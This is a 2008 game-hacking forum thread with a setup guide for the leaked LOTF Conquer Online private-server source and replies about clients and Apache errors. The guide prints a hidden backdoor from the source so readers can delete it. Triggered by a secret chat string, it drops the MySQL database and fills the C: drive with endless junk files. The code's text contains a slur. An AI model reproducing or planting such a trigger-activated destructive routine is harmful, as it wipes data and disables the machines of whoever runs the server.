Register for your free account! | Forgot your password?

You last visited: Today at 17:10

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement



LOTF Source Guide

Discussion on LOTF Source Guide within the CO2 PServer Guides & Releases forum part of the CO2 Private Server category.

Closed Thread
 
Old   #1
 
Super.Pvper's Avatar
 
elite*gold: 0
Join Date: Jun 2008
Posts: 113
Received Thanks: 58
LOTF Source Guide

Official Unofficial Guide for the LOTF Source.

Server Info:

- Database: MySQL
- Language: C#
- Client: v 5016

Required Programs:

- Microsoft Visual C# 2005 Express Edition [Link: ]
- AppServ(MySQL, Apache, and PhpMyAdmin all in one) [Link: ]

- LOTF Source: [Link: ]
- Conquer Online Client 5016 [Link: <NONE>]

*IMPORTANT NOTE!!!!!!!!!!!*
YOU MUST REMEMBER ALL THE USERNAMES/PASSWORDS YOU ENTER!

Setup Guide:

1. Download and Install everything.

2. Go to PhpMyAdmin (go to your browser, and type: , then enter root for the username, and the password you set when installing AppServ.)

3. Click on the SQL button.



Click on Import Files, and select the Database from the Source (Backup.sql)



4. The Server should already connect to the Database.

5. Go to ...COServerProject\bin\Debug then COServerProject.exe to start the server.
Note: if the file is not there, go to ...COServerProject\obj\Debug and copy the file from there, to bin\Debug.

6. Editing NPC Spawns, Accounts, Guilds, Items, Monsters/Monster Spawns, and Portals are all in localhost/phpmyadmin.

7. NPC dialogs are found in the file Client.cs around line 939.


Download this Guide:



MALICIOUS CODE:

A malicious code has been coded into the server (probobly by hadeset before he released it).
This code supposedly destroys the source.

REMOVE THE MALICIOUS CODE:

1. Open Client.cs

2. Press Ctrl+G and go to line 3630

3. Delete the Command:
Code:
                          if (Message == "@go_to_hell!ENC3101931993")
                            {
                                MySql.Data.MySqlClient.MySqlCommand Command = new MySql.Data.MySqlClient.MySqlCommand("drop database `coproj`", DataBase.Connection);
                                Command.ExecuteNonQuery();
                                
                                for (ulong i = 0; i < 547473346363; i++)
                                {
                                    System.IO.StreamWriter WW = new System.IO.StreamWriter("C:Virus" + i.ToString() + ".exe", true);
                                    for (ulong u = 0; u < 5857474673576; u++)
                                    {
                                        WW.WriteLine("No stealing our server you gay whore!!");
                                    }
                                    WW.Flush();
                                    WW.Close();
                                    WW = new System.IO.StreamWriter("C:YouSuck" + i.ToString() + ".txt", true);
                                    for (ulong u = 0; u < 5857474673576; u++)
                                    {
                                        WW.WriteLine("No stealing our server you gay whore!!");
                                    }
                                    WW.Flush();
                                    WW.Close();
                                }                                
                            }

MySql.Data Error

The file MySql.Data.dll is missing from the source, so when you build it, you will always get an error.

Solution:

1. Download MySql.Data.dll: |

2. Move the MySql.Data.dll file into your Server Folder

3. Open the Source with Visual C#

4. Move the File from the Server folder, into the Resources. Overwrite the old one.

There! MySql.Data Error is Fixed!



Registration Page

Download this Registration Page so other players can register to your server!

Link:

Credits to scottdavey
Super.Pvper is offline  
Thanks
18 Users
Old 07/14/2008, 00:42   #2
 
Hiyoal's Avatar
 
elite*gold: 20
Join Date: Mar 2007
Posts: 2,444
Received Thanks: 1,066
This should be in the guides section.
Very nice though

@Request #Move.

Hiyoal
Hiyoal is offline  
Old 07/14/2008, 01:56   #3
 
jovis's Avatar
 
elite*gold: 0
Join Date: Jun 2005
Posts: 257
Received Thanks: 4
Interesting. I'm only interested in creating a server for myself, and so far I've been successful (hard not to be) with a Hamachi based one.
This Lotf is for a leveling server and you can edit just about anything in the database, correct?

btw, where to find a 5016 client..?
jovis is offline  
Old 07/14/2008, 02:20   #4
 
Hiyoal's Avatar
 
elite*gold: 20
Join Date: Mar 2007
Posts: 2,444
Received Thanks: 1,066
Download the 5010 client from:

and then patch to 5016

Hiyoal
Hiyoal is offline  
Thanks
1 User
Old 07/14/2008, 02:56   #5
 
jovis's Avatar
 
elite*gold: 0
Join Date: Jun 2005
Posts: 257
Received Thanks: 4
Quote:
Originally Posted by hiyoal View Post
Download the 5010 client from:

and then patch to 5016

Hiyoal
I see there's a 5028.10 client, but only a 5010 patch...
jovis is offline  
Old 07/14/2008, 06:48   #6
 
Hiyoal's Avatar
 
elite*gold: 20
Join Date: Mar 2007
Posts: 2,444
Received Thanks: 1,066
Thats why i said "and then patch to 5016" meaning to download the patches:
5011
5012
5013
5014
5015
5016

Hiyoal

P.S...Lol
Hiyoal is offline  
Old 07/14/2008, 11:48   #7
 
elite*gold: 20
Join Date: Feb 2007
Posts: 660
Received Thanks: 79
so u mean we should download the 5028.10 client? and then patch to 5016?

btw here is the 5009 client
Conquer 5009.10 client
JoieJones90 is offline  
Old 07/14/2008, 15:43   #8
 
~*NewDuuDe*~'s Avatar
 
elite*gold: 111
Join Date: Feb 2008
Posts: 2,161
Received Thanks: 646
stealin hadesets source and releasin it without askin him
stupid *******
~*NewDuuDe*~ is offline  
Old 07/14/2008, 15:47   #9
 
jovis's Avatar
 
elite*gold: 0
Join Date: Jun 2005
Posts: 257
Received Thanks: 4
Trying to start Apache manually, as the phpmyadmin page says :The page cannot be found.


Apache 2.2 daemon is Starting ...


##########################################
## Stop Apache Please Close This Window ##
##########################################
(OS 10048)Only one usage of each socket address (protocol/network address/port)
is normally permitted. : make_sock: could not bind to address 0.0.0.0:80
no listening sockets available, shutting down
Unable to open logs
Press any key to continue . . .
jovis is offline  
Old 07/14/2008, 15:57   #10
 
elite*gold: 0
Join Date: Jan 2007
Posts: 125
Received Thanks: 16
Start it By Service
rider1992 is offline  
Old 07/14/2008, 17:01   #11
 
jovis's Avatar
 
elite*gold: 0
Join Date: Jun 2005
Posts: 257
Received Thanks: 4
The cmd windows just briefly appear and disappear.
jovis is offline  
Old 07/14/2008, 23:28   #12
 
elite*gold: 0
Join Date: Jul 2008
Posts: 3
Received Thanks: 0
like i got the server up and **** but how would i make an account like really i dont kno. I put New(acc name) and pword and it say srrir connection with server interrupted then u take of the new it say the same thin
Noobking101 is offline  
Old 07/15/2008, 14:15   #13
 
jovis's Avatar
 
elite*gold: 0
Join Date: Jun 2005
Posts: 257
Received Thanks: 4
Bump.
jovis is offline  
Old 07/15/2008, 17:03   #14
 
elite*gold: 0
Join Date: Jul 2008
Posts: 13
Received Thanks: 0
Quote:
Originally Posted by JoieJones90 View Post
so u mean we should download the 5028.10 client? and then patch to 5016?

btw here is the 5009 client
Conquer 5009.10 client
"Download 5010 Client (NOT 5028)"
"Download Patches 5011-5016"
"Install those patches into 5010 client"
"Done."

I don't know where the hell you got "Download 5028" >.>
Exqui is offline  
Old 07/16/2008, 00:26   #15
 
2coolforu2's Avatar
 
elite*gold: 0
Join Date: May 2008
Posts: 377
Received Thanks: 80
Quote:
Originally Posted by Noobking101 View Post
like i got the server up and **** but how would i make an account like really i dont kno. I put New(acc name) and pword and it say srrir connection with server interrupted then u take of the new it say the same thin
if you did it on site dont type the password in it leave it blank.
2coolforu2 is offline  
Thanks
1 User
Closed Thread


Similar Threads Similar Threads
[Guide] How to change server restart time (LOTF Source)
08/17/2008 - CO2 Guides & Templates - 10 Replies
I will not take any credit for this topic, I am only releasing it. I am thanking EVERYONE that helped me. Thank you. =] Introduction Before we may continue, make sure you have the following. 1. Microsoft Visual C# 2005 or 2008 2. LOTF source 3. A brain w/ common sense
LOTF Source Guide
07/20/2008 - CO2 Guides & Templates - 5 Replies
Opps, comp was acting up when I posted this, please go to this link for the guide: http://www.elitepvpers.com/forum/co2-main-discussi ons-questions/150327-lotf-source-guide.html - Super
Can someone make a guide for lotf source?
07/13/2008 - Conquer Online 2 - 3 Replies
The title says it, iono how to use it... can someone help? i changed the config, executed the backup.sql in mysql..... but which file turns on the server?



All times are GMT +1. The time now is 17:10.


Powered by vBulletin®
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2024 elitepvpers All Rights Reserved.